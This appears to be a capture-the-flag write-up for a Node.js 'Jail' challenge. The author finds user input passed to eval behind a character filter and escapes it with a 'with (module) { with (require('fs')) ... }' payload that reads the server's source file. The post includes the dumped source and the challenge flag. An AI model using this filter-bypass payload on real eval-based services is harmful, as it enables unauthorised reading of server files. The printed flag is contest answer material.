This is an interesting challenge… I through I knew JavaScript before this game but at the end of it I found out that there are still things I can learn.
Question:
Jail – Pwn (200 + 0)
Joey gave you the disk with the file on it and now you’re in jail. They’re charging you with some serious shit, man! Better figure out a way to escape.
Solves: 43
Service: jail.alieni.se:55542
Author: avlidienbrunn
Once I nc to the server, it showed the following screen
I tried to enter some character like 555-4202, it showed the following screen
Phone #> 555-4202 Calling -3647... Nobody picks up!
Cool! It looked like an eval function is used in this program. But I still didn’t know the programming language.
Next, I tried to enter the following
echo -e '\n12345' | nc jail.alieni.se 55542 Phone #> Calling undefined... Nobody picks up!
keyword undefined obtained! Which language will return undefined? The first thing came to my mind was JavaScript!
So I tried the following
Phone #> console.log('123'); Dangerous characters detected
Seems there was some filtering function before the program eval the answer. After some trying, I found this
Phone #> this Calling function call(number) { var hangup = process.exit; var line = ""; if(number == 911){ console.log("Invalid number"); ask(); return; } var flag,Array,Boolean,Date,global,Error,EvalError,Function,Number,Object,RangeError,ReferenceError,String,SyntaxError,TypeError,URIError,decodeURI,decodeURIComponent,encodeURI,encodeURIComponent,isFinite,isNaN,parseFloat,parseInt,ArrayBuffer,Buffer,DTRACE_HTTP_CLIENT_REQUEST,DTRACE_HTTP_CLIENT_RESPONSE,DTRACE_HTTP_SERVER_REQUEST,DTRACE_HTTP_SERVER_RESPONSE,DTRACE_NET_SERVER_CONNECTION,DTRACE_NET_STREAM_END,DataView,Float32Array,Float64Array,Int16Array,Int32Array,Int8Array,Map,Promise,Proxy,Set,Symbol,Uint16Array,Uint32Array,Uint8Array,Uint8ClampedArray,WeakMap,WeakSet,assert,clearImmediate,clearInterval,clearTimeout,escape,events,require,setImmediate,setInterval,setTimeout,stream,unescape,__defineGetter__,__defineSetter__,__lookupGetter__,__lookupSetter__,constructor,hasOwnProperty,isPrototypeOf,propertyIsEnumerable,toLocaleString,toString,valueOf; if(new RegExp(/[\[\]\.\\]/).test(number)){ console.log("Dangerous characters detected"); hangup(); return; } arguments = undefined; console.log("Calling "+eval(number)+"... Nobody picks up!"); hangup(); }... Nobody picks up!
Ok, the filter function was clear. The default functions were redefined to undefined by the function scoping feature of JavaScript. And the ‘[‘,’]’,’.’ were filtered by the RegExp.
So, it ‘seems’ all the function call were blocked. But, is it real?
At the time I learnt the programming language VBScript at the very first beginning, there was a magic statement called ‘with’. Thanks to ECMAScript 262, with is also defined in JavaScript!
HAHA, the poc
Phone #> with (module) { with (require('fs')) { readFileSync(__filename) } } Calling var flag = "SECT{1ts_1n_th4T_pl4Ce_Wh3re_1_Pu7_tH4t_Th1ng_th4T_t1m3,}" var readline = require('readline'); var rl = readline.createInterface(process.stdin, process.stdout); var Jail = (function() { var rv = {}; function call(number) { var hangup = process.exit; var line = ""; if(number == 911){ console.log("Invalid number"); ask(); return; } var flag,Array,Boolean,Date,global,Error,EvalError,Function,Number,Object,RangeError,ReferenceError,String,SyntaxError,TypeError,URIError,decodeURI,decodeURIComponent,encodeURI,encodeURIComponent,isFinite,isNaN,parseFloat,parseInt,ArrayBuffer,Buffer,DTRACE_HTTP_CLIENT_REQUEST,DTRACE_HTTP_CLIENT_RESPONSE,DTRACE_HTTP_SERVER_REQUEST,DTRACE_HTTP_SERVER_RESPONSE,DTRACE_NET_SERVER_CONNECTION,DTRACE_NET_STREAM_END,DataView,Float32Array,Float64Array,Int16Array,Int32Array,Int8Array,Map,Promise,Proxy,Set,Symbol,Uint16Array,Uint32Array,Uint8Array,Uint8ClampedArray,WeakMap,WeakSet,assert,clearImmediate,clearInterval,clearTimeout,escape,events,require,setImmediate,setInterval,setTimeout,stream,unescape,__defineGetter__,__defineSetter__,__lookupGetter__,__lookupSetter__,constructor,hasOwnProperty,isPrototypeOf,propertyIsEnumerable,toLocaleString,toString,valueOf; if(new RegExp(/[\[\]\.\\]/).test(number)){ console.log("Dangerous characters detected"); hangup(); return; } arguments = undefined; console.log("Calling "+eval(number)+"... Nobody picks up!"); hangup(); }; rv.call = call; rv.toString = function(){return rv.call.toString()}; return rv; })(); template = `_____________________________ || || || || || ||, , ,|| || || (||/|/(\/||/ || || ||| _'_´||| || || || o o || || || (|| - ´||) || || || = || || || ||\\___/|| || ||___||) , (||___|| /||---||-\\_/-||---||\\ / ||--_||_____||_--|| \\ (_(||)-|S555-4202|-(||)_) |"""""""""""""""""""""""""""| | "You get one call, UNO." | """"""""""""""""""""""""""" Phone #> `; function ask(){ rl.question(template,function(answer){ Jail.call(answer); }); } ask(); ... Nobody picks up!
Cheers!
發表留言